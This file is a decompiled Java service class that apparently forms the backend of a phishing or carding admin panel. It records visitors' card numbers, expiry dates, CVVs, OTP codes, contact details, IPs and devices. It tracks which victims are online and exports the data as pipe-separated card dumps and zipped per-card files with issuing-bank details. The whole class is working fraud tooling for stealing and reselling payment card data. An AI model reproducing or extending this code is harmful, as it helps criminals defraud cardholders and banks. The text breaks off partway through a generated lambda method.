package com.mdd.admin.service.impl;

import com.alibaba.fastjson2.JSONObject;
import com.alibaba.fastjson2.JSONReader;
import com.alibaba.fastjson2.JSONWriter;
import com.baomidou.mybatisplus.core.conditions.Wrapper;
import com.baomidou.mybatisplus.core.conditions.query.LambdaQueryWrapper;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import com.baomidou.mybatisplus.core.metadata.IPage;
import com.baomidou.mybatisplus.extension.plugins.pagination.Page;
import com.github.yulichang.query.MPJQueryWrapper;
import com.github.yulichang.wrapper.MPJLambdaWrapper;
import com.google.common.collect.Lists;
import com.mdd.admin.LikeAdminThreadLocal;
import com.mdd.admin.cache.RedisCache;
import com.mdd.admin.service.IBlackListService;
import com.mdd.admin.service.IUserConfigService;
import com.mdd.admin.service.IUserOrderService;
import com.mdd.admin.validate.BlackListCreateValidate;
import com.mdd.admin.validate.commons.PageValidate;
import com.mdd.admin.validate.order.CardBindOrderValidate;
import com.mdd.admin.validate.order.UserOrderCreateValidate;
import com.mdd.admin.validate.order.UserOrderDelValidate;
import com.mdd.admin.validate.order.UserOrderDownValidate;
import com.mdd.admin.validate.order.UserOrderSearchValidate;
import com.mdd.admin.validate.order.UserOrderUpdateValidate;
import com.mdd.admin.vo.UserOrderDetailVo;
import com.mdd.admin.vo.UserOrderListedVo;
import com.mdd.admin.vo.UserOrderSocketVo;
import com.mdd.common.config.GlobalConfig;
import com.mdd.common.core.AjaxResult;
import com.mdd.common.core.PageResult;
import com.mdd.common.entity.CardLog;
import com.mdd.common.entity.CodeLog;
import com.mdd.common.entity.OrderAdmin;
import com.mdd.common.entity.UserConfig;
import com.mdd.common.entity.UserOrder;
import com.mdd.common.mapper.CardLogMapper;
import com.mdd.common.mapper.CodeLogMapper;
import com.mdd.common.mapper.OrderAdminMapper;
import com.mdd.common.mapper.UserConfigMapper;
import com.mdd.common.mapper.UserOrderMapper;
import com.mdd.common.plugin.storage.engine.LocalStorage;
import com.mdd.common.util.DateUtils;
import com.mdd.common.util.StringUtils;
import com.mdd.common.util.TimeUtils;
import java.lang.invoke.SerializedLambda;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Comparator;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.Set;
import java.util.concurrent.TimeUnit;
import java.util.function.Function;
import java.util.stream.Collectors;
import javax.annotation.Resource;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.scheduling.annotation.Async;
import org.springframework.stereotype.Service;
import org.springframework.util.Assert;

@Service
public class UserOrderServiceImpl implements IUserOrderService {
   @Resource
   UserOrderMapper userOrderMapper;
   @Resource
   CardLogMapper cardLogMapper;
   @Resource
   CodeLogMapper codeLogMapper;
   @Autowired
   private RedisCache redisCache;
   @Autowired
   private IBlackListService blackListService;
   @Resource
   UserConfigMapper userConfigMapper;
   @Resource
   IUserConfigService userConfigService;
   @Resource
   OrderAdminMapper orderAdminMapper;

   public PageResult<UserOrderListedVo> list(PageValidate pageValidate, UserOrderSearchValidate searchValidate) {
      Integer page = pageValidate.getPageNo();
      Integer limit = pageValidate.getPageSize();
      List<Integer> roleIds = LikeAdminThreadLocal.getRoleIds();
      List<UserOrderListedVo> list = new LinkedList();
      MPJQueryWrapper<UserOrder> queryWrapper = new MPJQueryWrapper();
      queryWrapper.orderByDesc("t.id");
      if (Objects.equals(searchValidate.getAccessCtr(), 1)) {
         Collection<String> keys = this.redisCache.keys("line_order_*");
         if (keys.isEmpty()) {
            return PageResult.iPageHandle(0L, 1L, 0L, list);
         }

         String floodIds = (String)keys.stream().map((tmp) -> {
            return tmp.replace("line_order_", "");
         }).collect(Collectors.joining(","));
         searchValidate.setFloodIds(floodIds);
         queryWrapper.in("status", new Object[]{0, 1});
      }

      List<Integer> lineFloodIds = new ArrayList();
      Collection cardKeys;
      if (Objects.equals(searchValidate.getAccessCtr(), 2)) {
         cardKeys = this.redisCache.keys("line_order_*");
         String floodIds = (String)cardKeys.stream().map((tmp) -> {
            String orStr = tmp.replace("line_order_", "");
            lineFloodIds.add(Integer.parseInt(orStr));
            return orStr;
         }).collect(Collectors.joining(","));
         if (searchValidate.getOnline()) {
            if (cardKeys.isEmpty()) {
               return PageResult.iPageHandle(0L, 1L, 0L, list);
            }

            searchValidate.setFloodIds(floodIds);
         }

         queryWrapper.eq("status", 1);
      }

      cardKeys = this.redisCache.keys("card_cache_*");
      if (searchValidate.getIsCard()) {
         searchValidate.setCardCacheIds((Set)cardKeys.stream().map((tmp) -> {
            return Integer.parseInt(tmp.replace("card_cache_", ""));
         }).collect(Collectors.toSet()));
      }

      this.setSearchParams(queryWrapper, searchValidate);
      queryWrapper.selectAll(UserOrder.class);
      IPage<UserOrder> iPage = this.userOrderMapper.selectJoinPage(new Page((long)page, (long)limit), UserOrder.class, queryWrapper);
      Collection<String> infoKeys = this.redisCache.keys("info_cache_*");

      UserOrderListedVo vo;
      for(Iterator var12 = iPage.getRecords().iterator(); var12.hasNext(); list.add(vo)) {
         UserOrder item = (UserOrder)var12.next();
         vo = new UserOrderListedVo();
         BeanUtils.copyProperties(item, vo);
         vo.setCreateTime(TimeUtils.timestampToDate(item.getCreateTime()));
         vo.setUpdateTime(TimeUtils.timestampToDate(item.getUpdateTime()));
         if (!lineFloodIds.isEmpty() && lineFloodIds.contains(vo.getFloodId())) {
            vo.setUserState(1);
         }

         String key = "card_cache_" + vo.getFloodId();
         if (cardKeys.contains(key)) {
            Object obj = this.redisCache.getCache(key);
            vo.setCardCache(JSONObject.toJSONString(obj, new JSONWriter.Feature[0]));
         }

         String infoKey = "info_cache_" + vo.getFloodId();
         if (infoKeys.contains(infoKey)) {
            Object obj = this.redisCache.getCache(infoKey);
            vo.setInfoCache(JSONObject.toJSONString(obj, new JSONWriter.Feature[0]));
         }

         String opKey = "option_cache_" + vo.getFloodId();
         if (this.redisCache.hasKey(opKey)) {
            Object obj = this.redisCache.getCache(opKey);
            vo.setOptionCache(JSONObject.toJSONString(obj, new JSONWriter.Feature[0]));
         }

         if (roleIds.contains(2)) {
            vo.setInfoHide();
         }
      }

      return PageResult.iPageHandle(iPage.getTotal(), iPage.getCurrent(), iPage.getSize(), list);
   }

   private void setSearchParams(MPJQueryWrapper<UserOrder> queryWrapper, UserOrderSearchValidate searchValidate) {
      if (searchValidate.getIsCard()) {
         if (searchValidate.getCardCacheIds() != null && !searchValidate.getCardCacheIds().isEmpty()) {
            queryWrapper.and((w) -> {
               MPJQueryWrapper var10000 = (MPJQueryWrapper)((MPJQueryWrapper)((MPJQueryWrapper)w.isNotNull("card_id")).or()).in("flood_id", searchValidate.getCardCacheIds());
            });
         } else {
            queryWrapper.isNotNull("card_id");
         }
      }

      if (LikeAdminThreadLocal.getRoleIds().contains(1)) {
         queryWrapper.leftJoin("?_order_admin oa ON oa.order_id = t.id".replace("?_", GlobalConfig.tablePrefix));
         if (this.userConfigService.viewNoSplit()) {
            queryWrapper.and((query) -> {
               MPJQueryWrapper var10000 = (MPJQueryWrapper)((MPJQueryWrapper)((MPJQueryWrapper)query.eq("oa.admin_id", LikeAdminThreadLocal.getAdminId())).or()).isNull("view_ids");
            });
         } else {
            queryWrapper.eq("oa.admin_id", LikeAdminThreadLocal.getAdminId());
         }
      }

      this.userOrderMapper.setSearch(queryWrapper, searchValidate, new String[]{"in:floodIds@flood_id:int", "=:userId@user_id:int", "=:orderId@id:int", "=:sessionId@session_id:str", "likeLeft:cardNum@card_num:str", "=:ip:str", "=:country:str", "=:domain:str", "=:userAgent@user_agent:str", "=:phone:str", "=:productData@product_data:str", "=:userData@user_data:str", "=:progress:int", "=:otp:str", "=:expireTime@expire_time:int", "=:status:int", "=:adminId@admin_id:int", "datetime:startTime-endTime@create_time:str"});
   }

   public UserOrderDetailVo detail(Integer id) {
      UserOrder model = (UserOrder)this.userOrderMapper.selectById(id);
      return this.detailInfo(model);
   }

   public UserOrderDetailVo detailV2(Integer floodId) {
      UserOrder model = this.userOrderMapper.selectByFloodId(floodId);
      return this.detailInfo(model);
   }

   public UserOrder orderInfo(Integer floodId) {
      return this.userOrderMapper.selectByFloodId(floodId);
   }

   private UserOrderDetailVo detailInfo(UserOrder model) {
      Assert.notNull(model, "数据不存在");
      List<Integer> roleIds = LikeAdminThreadLocal.getRoleIds();
      Boolean hideField = roleIds.contains(2);
      UserOrderDetailVo vo = new UserOrderDetailVo();
      BeanUtils.copyProperties(model, vo);
      String key = "card_cache_" + vo.getFloodId();
      String opKey;
      if (this.redisCache.hasKey(key)) {
         Object obj = this.redisCache.getCache(key);
         opKey = JSONObject.toJSONString(obj, new JSONWriter.Feature[0]);
         vo.setCardCache(opKey);
         CardLog cache = (CardLog)JSONObject.parseObject(opKey).getJSONObject("data").getObject("CardInput", CardLog.class, new JSONReader.Feature[0]);
         vo.setHolder(cache.getHolder());
         vo.setNumber(cache.getNumber());
         vo.setExpiry(cache.getExpiry());
         vo.setCvv(cache.getCvv());
      }

      String infoKey = "info_cache_" + vo.getFloodId();
      if (this.redisCache.hasKey(infoKey)) {
         Object obj = this.redisCache.getCache(infoKey);
         vo.setInfoCache(JSONObject.toJSONString(obj, new JSONWriter.Feature[0]));
      }

      opKey = "option_cache_" + vo.getFloodId();
      if (this.redisCache.hasKey(opKey)) {
         Object obj = this.redisCache.getCache(opKey);
         vo.setOptionCache(JSONObject.toJSONString(obj, new JSONWriter.Feature[0]));
      }

      List<CardLog> cards = this.cardLogMapper.selectList((Wrapper)((LambdaQueryWrapper)(new LambdaQueryWrapper()).eq(CardLog::getOrderId, vo.getId())).orderByDesc(CardLog::getId));
      if (hideField) {
         cards = (List)cards.stream().peek((objx) -> {
            objx.setHolder(StringUtils.generateStars(objx.getHolder()));
            objx.setNumber(StringUtils.showField(objx.getNumber(), 6));
            objx.setExpiry(StringUtils.generateStars(objx.getExpiry()));
            objx.setCvv(StringUtils.generateStars(objx.getCvv()));
         }).collect(Collectors.toList());
      }

      if (StringUtils.isEmpty(vo.getCardCache()) && !cards.isEmpty()) {
         CardLog card = (CardLog)cards.get(0);
         vo.setHolder(card.getHolder());
         vo.setNumber(card.getNumber());
         vo.setExpiry(card.getExpiry());
         vo.setCvv(card.getCvv());
         vo.setType(card.getType());
         vo.setTypes(card.getTypes());
      }

      vo.setCardLogs(cards);
      List<CodeLog> codes = this.codeLogMapper.selectList((Wrapper)((LambdaQueryWrapper)(new LambdaQueryWrapper()).eq(CodeLog::getOrderId, vo.getId())).orderByDesc(CodeLog::getId));
      if (hideField) {
         codes = (List)codes.stream().peek((objx) -> {
            objx.setNumber(StringUtils.showField(objx.getNumber(), 6));
         }).collect(Collectors.toList());
      }

      vo.setCodeLogList(codes);
      vo.setUserState(this.redisCache.hasKey("line_order_" + vo.getFloodId()) ? 1 : 0);
      vo.setCreateTime(TimeUtils.timestampToDate(model.getCreateTime()));
      vo.setUpdateTime(TimeUtils.timestampToDate(model.getUpdateTime()));
      if (hideField) {
         vo.setInfoHide();
      }

      return vo;
   }

   public UserOrder add(UserOrderCreateValidate createValidate) {
      UserOrder model = new UserOrder();
      model.setUserId(createValidate.getUserId());
      model.setFloodId(createValidate.getFloodId());
      model.setSessionId(createValidate.getSessionId());
      model.setIp(createValidate.getIp());
      model.setCountry(createValidate.getCountry());
      model.setDomain(createValidate.getDomain());
      model.setDevice(createValidate.getDevice());
      model.setBrowser(createValidate.getBrowser());
      model.setUserAgent(createValidate.getUserAgent());
      model.setLanguage(createValidate.getLanguage());
      model.setExpireTime(0);
      model.setStatus(0);
      model.setAdminId(createValidate.getAdminId());
      model.setSplit(createValidate.getSplit());
      model.setViewIds(createValidate.getViewIds());
      model.setCreateTime(System.currentTimeMillis() / 1000L);
      model.setUpdateTime(System.currentTimeMillis() / 1000L);
      if (this.userOrderMapper.getAutoIncrement() < 1000) {
         this.userOrderMapper.setAutoIncrementStart();
      }

      this.userOrderMapper.insert(model);
      UserOrderSocketVo vo = new UserOrderSocketVo();
      BeanUtils.copyProperties(model, vo);
      this.redisCache.setCacheObject("flood_socket_order:" + model.getFloodId(), vo, 180, TimeUnit.MINUTES);
      return model;
   }

   public void edit(UserOrderUpdateValidate updateValidate) {
      UserOrder model = (UserOrder)this.userOrderMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", updateValidate.getId())).last("limit 1"));
      Assert.notNull(model, "数据不存在!");
      model.setProgress(updateValidate.getProgress());
      model.setOtp(updateValidate.getOtp());
      model.setCustPhone(updateValidate.getCustPhone());
      model.setCustEmail(updateValidate.getCustEmail());
      model.setStatus(updateValidate.getStatus());
      model.setUpdateTime(System.currentTimeMillis() / 1000L);
      this.updateById(model);
   }

   public void updateById(UserOrder obj) {
      UserOrder order;
      if (obj.getFloodId() == null) {
         order = (UserOrder)this.userOrderMapper.selectById(obj.getId());
         obj.setFloodId(order.getFloodId());
      }

      if (obj.getProgress() != null) {
         this.redisCache.setCacheObject("process_cache_" + obj.getFloodId(), obj.getProgress(), 3600, TimeUnit.SECONDS);
      }

      order = (UserOrder)this.userOrderMapper.selectById(obj.getId());
      String ip = order.getIp();
      LambdaQueryWrapper<UserConfig> query = (LambdaQueryWrapper)(new LambdaQueryWrapper()).eq(UserConfig::getDomain, order.getDomain());
      UserConfig config = (UserConfig)this.userConfigMapper.selectOne((Wrapper)query.last("limit 1"));
      boolean wpPlugin = config != null && Objects.equals(config.getCategory(), 6);
      if (!wpPlugin && obj.getStatus() != null && (obj.getStatus() == 2 || obj.getStatus() == 4) && !Objects.equals(obj.getIp(), "14.107.172.80")) {
         BlackListCreateValidate black = new BlackListCreateValidate();
         black.setIp(ip);
         black.setType(obj.getStatus() == 2 ? 1 : 2);
         black.setOrderId(obj.getId());
         this.blackListService.add(black);
      }

      this.userOrderMapper.updateById(obj);
   }

   public void del(UserOrderDelValidate delValidate) {
      MPJQueryWrapper<UserOrder> query = new MPJQueryWrapper();
      if (LikeAdminThreadLocal.getRoleIds().contains(1)) {
         query.leftJoin("?_order_admin oa ON oa.order_id = t.id".replace("?_", GlobalConfig.tablePrefix));
         if (this.userConfigService.viewNoSplit()) {
            query.and((tmp) -> {
               MPJQueryWrapper var10000 = (MPJQueryWrapper)((MPJQueryWrapper)((MPJQueryWrapper)tmp.eq("oa.admin_id", LikeAdminThreadLocal.getAdminId())).or()).isNull("view_ids");
            });
         } else {
            query.eq("oa.admin_id", LikeAdminThreadLocal.getAdminId());
         }
      }

      if (delValidate.getStatus() != null) {
         query.eq("t.status", delValidate.getStatus());
      }

      if (delValidate.getId() != null) {
         query.eq("t.id", delValidate.getId());
      }

      if (delValidate.getOption() == 1) {
         UserOrder order = new UserOrder();
         order.setStatus(3);
         this.userOrderMapper.updateJoin(order, query);
      } else if (delValidate.getOption() == 2) {
         this.userOrderMapper.deleteJoin(query);
         this.deleteCache(query);
         MPJLambdaWrapper<OrderAdmin> delMapper = new MPJLambdaWrapper();
         delMapper.leftJoin(UserOrder.class, UserOrder::getId, OrderAdmin::getOrderId);
         delMapper.isNull(UserOrder::getId);
         this.orderAdminMapper.deleteJoin(delMapper);
      }

   }

   @Async
   protected void deleteCache(MPJQueryWrapper<UserOrder> query) {
      query.select(new String[]{"flood_id"});
      List<UserOrder> orders = this.userOrderMapper.selectJoinList(UserOrder.class, query);
      orders.forEach((order) -> {
         this.redisCache.deleteObject("line_order_" + order.getFloodId());
         this.redisCache.deleteObject("info_cache_" + order.getFloodId());
         this.redisCache.deleteObject("card_cache_" + order.getFloodId());
         this.redisCache.deleteObject("option_cache_" + order.getFloodId());
         this.redisCache.deleteObject("process_cache_" + order.getFloodId());
      });
   }

   public AjaxResult<?> commit(UserOrderUpdateValidate updateValidate, UserOrder model) {
      UserOrder update = new UserOrder();
      update.setId(model.getId());
      update.setPhone(updateValidate.getPhone());
      update.setProductData(updateValidate.getProductData());
      update.setUserData(updateValidate.getUserData());
      if (updateValidate.getProgress() != null) {
         update.setProgress(updateValidate.getProgress());
      }

      if (StringUtils.isNotEmpty(updateValidate.getUserData()) && model.getStatus() == 0) {
         update.setStatus(1);
      }

      this.updateById(update);
      return AjaxResult.success();
   }

   public AjaxResult<UserOrder> selectOrder(String sessionId) {
      UserOrder model = (UserOrder)this.userOrderMapper.selectOne((Wrapper)((LambdaQueryWrapper)(new LambdaQueryWrapper()).eq(UserOrder::getSessionId, sessionId)).last("order by id desc limit 1"));
      if (model == null) {
         return AjaxResult.failed("Order does not exist!", (Object)null);
      } else {
         return model.getStatus() == 3 ? AjaxResult.failed("The order has expired!", (Object)null) : AjaxResult.success(model);
      }
   }

   public AjaxResult<?> upDown(UserOrderDownValidate downValidate) {
      return AjaxResult.success();
   }

   public AjaxResult<?> bindCard(CardBindOrderValidate bindValidate) {
      UserOrder order = (UserOrder)this.userOrderMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", bindValidate.getId())).last("limit 1"));
      Assert.notNull(order, "订单数据不存在");
      CardLog card = (CardLog)this.cardLogMapper.selectOne((Wrapper)((QueryWrapper)(new QueryWrapper()).eq("id", bindValidate.getCardId())).last("limit 1"));
      Assert.notNull(card, "卡数据不存在");
      List<CardLog> cards = this.cardLogMapper.selectList((Wrapper)((LambdaQueryWrapper)((LambdaQueryWrapper)(new LambdaQueryWrapper()).eq(CardLog::getNumber, card.getNumber())).eq(CardLog::getOrderId, order.getId())).eq(CardLog::getRemark, 1));
      if (!cards.isEmpty()) {
         return AjaxResult.failed("该卡号已绑定此订单");
      } else {
         CardLog ca = new CardLog();
         ca.setId(card.getId());
         ca.setRemark(1);
         this.cardLogMapper.updateById(ca);
         UserOrder up = new UserOrder();
         up.setId(order.getId());
         up.setCardId(bindValidate.getCardId());
         this.updateById(up);
         return AjaxResult.success();
      }
   }

   public AjaxResult<?> export(UserOrderSearchValidate searchValidate) {
      MPJQueryWrapper<UserOrder> queryWrapper = new MPJQueryWrapper();
      queryWrapper.orderByDesc("t.id");
      this.setSearchParams(queryWrapper, searchValidate);
      List<UserOrder> orders = this.queryAllOrdersByPage(queryWrapper, 2000);
      List<CardLog> cards = this.queryAllCardByOrder(orders, new QueryWrapper(), 500);
      return this.exportBuild(orders, cards, searchValidate.getDuplicate(), searchValidate.getExportType());
   }

   public AjaxResult<?> exportBuild(List<UserOrder> orders, List<CardLog> cards, Integer duplicate, Integer exportType) {
      Map<Integer, UserOrder> orderMap = (Map)orders.stream().collect(Collectors.toMap(UserOrder::getId, Function.identity()));
      ((List)cards).sort(Comparator.comparingInt(CardLog::getId).reversed());
      if (duplicate == 0) {
         Map<String, CardLog> firstCardPerOrder = (Map)((List)cards).stream().collect(Collectors.toMap(CardLog::getNumber, Function.identity(), (existing, replacement) -> {
            return existing;
         }));
         cards = new ArrayList(firstCardPerOrder.values());
      }

      String path = "";
      Iterator var8;
      CardLog card;
      UserOrder order;
      if (exportType == 0) {
         StringBuilder text = new StringBuilder("卡号|年月|CVV|姓名|地址|城市|州|邮编|国家|电话|邮箱|生日|IP\n");
         var8 = ((List)cards).iterator();

         while(var8.hasNext()) {
            card = (CardLog)var8.next();
            order = (UserOrder)orderMap.get(card.getOrderId());
            if (order != null) {
               text.append(this.buildSimple(order, card));
            }
         }

         path = DateUtils.getDate() + "/card_" + TimeUtils.timestamp() + ".txt";
         LocalStorage.saveTextFile(text.toString(), path);
      } else {
         if (exportType != 1) {
            return AjaxResult.failed("暂不支持此导出类型");
         }

         String folder = DateUtils.getDate() + "_" + TimeUtils.timestamp();
         var8 = ((List)cards).iterator();

         while(var8.hasNext()) {
            card = (CardLog)var8.next();
            order = (UserOrder)orderMap.get(card.getOrderId());
            if (order != null) {
               String text = this.buildDetail(order, card);
               String tmpUrl = folder + "/" + card.getNumber() + "---" + card.getTypes() + "---" + card.getState() + "---" + card.getId() + ".txt";
               LocalStorage.saveTextFile(text, tmpUrl.replace("null", ""));
            }
         }

         path = folder + "/output_" + TimeUtils.timestamp() + ".zip";
         LocalStorage.zipFiles(folder, path);
      }

      return AjaxResult.success("操作成功", GlobalConfig.publicPrefix + "/" + path);
   }

   private String buildSimple(UserOrder order, CardLog card) {
      StringBuilder text = new StringBuilder();
      JSONObject userData = JSONObject.parseObject(order.getUserData());
      if (userData == null) {
         userData = new JSONObject();
      }

      String address_1 = userData.getString("address_1");
      String address_2 = userData.getString("address_2");
      String city = userData.getString("city");
      String state = userData.getString("state");
      String zip_code = userData.getString("zip_code");
      String country = StringUtils.isNotEmpty(card.getState()) ? card.getState() : order.getCountry();
      String phone = userData.getString("phone");
      String email = userData.getString("email");
      String birthday = userData.getString("birthday");
      text.append(card.getNumber()).append("|");
      text.append(card.getExpiry()).append("|");
      text.append(card.getCvv()).append("|");
      text.append(card.getHolder()).append("|");
      text.append(address_1).append(" ").append(address_2 == null ? "" : address_2).append("|");
      text.append(city).append("|");
      text.append(state).append("|");
      text.append(zip_code).append("|");
      text.append(country).append("|");
      text.append(phone).append("|");
      text.append(email).append("|");
      text.append(birthday).append("|");
      text.append(order.getIp()).append("\n");
      return text.toString().replace("null", "");
   }

   private String buildDetail(UserOrder order, CardLog card) {
      JSONObject userData = JSONObject.parseObject(order.getUserData());
      if (userData == null) {
         userData = new JSONObject();
      }

      String address_1 = userData.getString("address_1");
      String address_2 = userData.getString("address_2");
      String first_name = userData.getString("first_name");
      String last_name = userData.getString("last_name");
      String city = userData.getString("city");
      String state = userData.getString("state");
      String zip_code = userData.getString("zip_code");
      String country = StringUtils.isNotEmpty(card.getState()) ? card.getState() : order.getCountry();
      String phone = userData.getString("phone");
      String email = userData.getString("email");
      String birthday = userData.getString("birthday");
      StringBuilder text = new StringBuilder();
      text.append("\n[ 用户信息 ]");
      text.append("\n#-------------------------------------------------------#\n");
      text.append("姓名：").append(first_name).append(" ").append(last_name).append("\n");
      text.append("电话：").append(phone).append("\n");
      text.append("邮箱：").append(email).append("\n");
      text.append("生日：").append(birthday).append("\n");
      text.append("\n[ 地址信息 ]");
      text.append("\n#--------------------------------------------------------#\n");
      text.append("国家：").append(country).append("\n");
      text.append("地址1：").append(address_1).append("\n");
      text.append("地址2：").append(address_2).append("\n");
      text.append("城市：").append(city).append("\n");
      text.append("州：").append(state).append("\n");
      text.append("邮编：").append(zip_code).append("\n");
      text.append("\n[ 付款详情 ]");
      text.append("\n#--------------------------------------------------------#\n");
      text.append("持卡人：").append(card.getHolder()).append("\n");
      text.append("卡号：").append(card.getNumber()).append("\n");
      text.append("过期时间：").append(card.getExpiry()).append("\n");
      text.append("CVV：").append(card.getCvv()).append("\n");
      text.append("PIN：").append("").append("\n");
      text.append("\n[ 卡片详情 ]");
      text.append("\n#--------------------------------------------------------#\n");
      text.append("持卡人：").append(card.getHolder()).append("\n");
      text.append("发行机构：").append(card.getBrand()).append("\n");
      text.append("发行国家：").append(card.getState()).append("\n");
      text.append("卡片类型：").append(card.getTypes()).append("\n");
      text.append("卡片等级：").append(card.getLevel()).append("\n");
      text.append("卡片银行：").append(card.getBank()).append("\n");
      text.append("币别：").append(card.getCurrency()).append("\n");
      text.append("银行网站：").append(card.getBankWebsite()).append("\n");
      text.append("银行电话：").append(card.getBankPhone()).append("\n");
      text.append("是否商业：").append(card.getCommercial()).append("\n");
      text.append("是否预付费：").append(card.getPrepaid()).append("\n");
      text.append("\n[ 环境详情 ]");
      text.append("\n#--------------------------------------------------------#\n");
      text.append("持卡人：").append(card.getHolder()).append("\n");
      text.append("IP：").append(order.getIp()).append("\n");
      text.append("User-Agent：").append(order.getUserAgent()).append("\n");
      text.append("设备：").append(order.getDevice()).append(" / ").append(order.getBrowser()).append("\n");
      text.append("创建时间：").append(TimeUtils.timestampToDate(order.getCreateTime())).append("\n");
      text.append("\n");
      return text.toString().replace("null", "");
   }

   public List<UserOrder> queryAllOrdersByPage(MPJQueryWrapper<UserOrder> queryWrapper, int pageSize) {
      List<UserOrder> allOrders = new ArrayList();
      int pageNum = 1;
      queryWrapper.select(new String[]{"t.id"});
      long total = this.userOrderMapper.selectCount(queryWrapper);
      int totalPages = (int)Math.ceil((double)total / (double)pageSize);
      queryWrapper.selectAll(UserOrder.class);

      for(int i = 0; i < totalPages; ++i) {
         Page<UserOrder> page = new Page((long)(pageNum++), (long)pageSize);
         IPage<UserOrder> iPage = this.userOrderMapper.selectJoinPage(page, UserOrder.class, queryWrapper);
         allOrders.addAll(iPage.getRecords());
      }

      return allOrders;
   }

   public List<CardLog> queryAllCardByOrder(List<UserOrder> orders, QueryWrapper<CardLog> queryWrapper, int pageSize) {
      List<CardLog> allCards = new ArrayList();
      List<Integer> orderIds = (List)orders.stream().map(UserOrder::getId).collect(Collectors.toList());
      List<List<Integer>> lists = Lists.partition(orderIds, pageSize);
      Iterator var7 = lists.iterator();

      while(var7.hasNext()) {
         List<Integer> ids = (List)var7.next();
         queryWrapper.in("order_id", ids);
         List<CardLog> list = this.cardLogMapper.selectList(queryWrapper);
         allCards.addAll(list);
      }

      List<CardLog> cacheLog = new ArrayList();
      Iterator var15 = orders.iterator();

      while(var15.hasNext()) {
         UserOrder order = (UserOrder)var15.next();
         if (this.redisCache.hasKey("card_cache_" + order.getFloodId())) {
            Object obj = this.redisCache.getCache("card_cache_" + order.getFloodId());

            try {
               JSONObject json = JSONObject.parseObject(JSONObject.toJSONString(obj, new JSONWriter.Feature[0]));
               CardLog cache = (CardLog)json.getJSONObject("data").getObject("CardInput", CardLog.class, new JSONReader.Feature[0]);
               if (StringUtils.isNotEmpty(cache.getHolder()) && StringUtils.isNotEmpty(cache.getNumber()) && cache.getNumber().length() > 6 && StringUtils.isNotEmpty(cache.getExpiry()) && StringUtils.isNotEmpty(cache.getCvv())) {
                  cache.setNumber(cache.getNumber().replace(" ", ""));
                  cache.setOrderId(order.getId());
                  cacheLog.add(cache);
               }
            } catch (Exception var13) {
            }
         }
      }

      var15 = cacheLog.iterator();

      while(var15.hasNext()) {
         CardLog log = (CardLog)var15.next();
         log.setId(999999999);
         allCards.add(log);
      }

      return allCards;
   }

   // $FF: synthetic method
   private static Object $deserializeLambda$(SerializedLambda lambda) {
      switch (lambda.getImplMethodName()) {
         case "getDomain":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserConfig") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserConfig::getDomain;
            }
            break;
         case "getNumber":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return CardLog::getNumber;
            }
            break;
         case "getRemark":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getRemark;
            }
            break;
         case "getOrderId":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getOrderId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CodeLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CodeLog::getOrderId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/OrderAdmin") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return OrderAdmin::getOrderId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getOrderId;
            }
            break;
         case "getId":
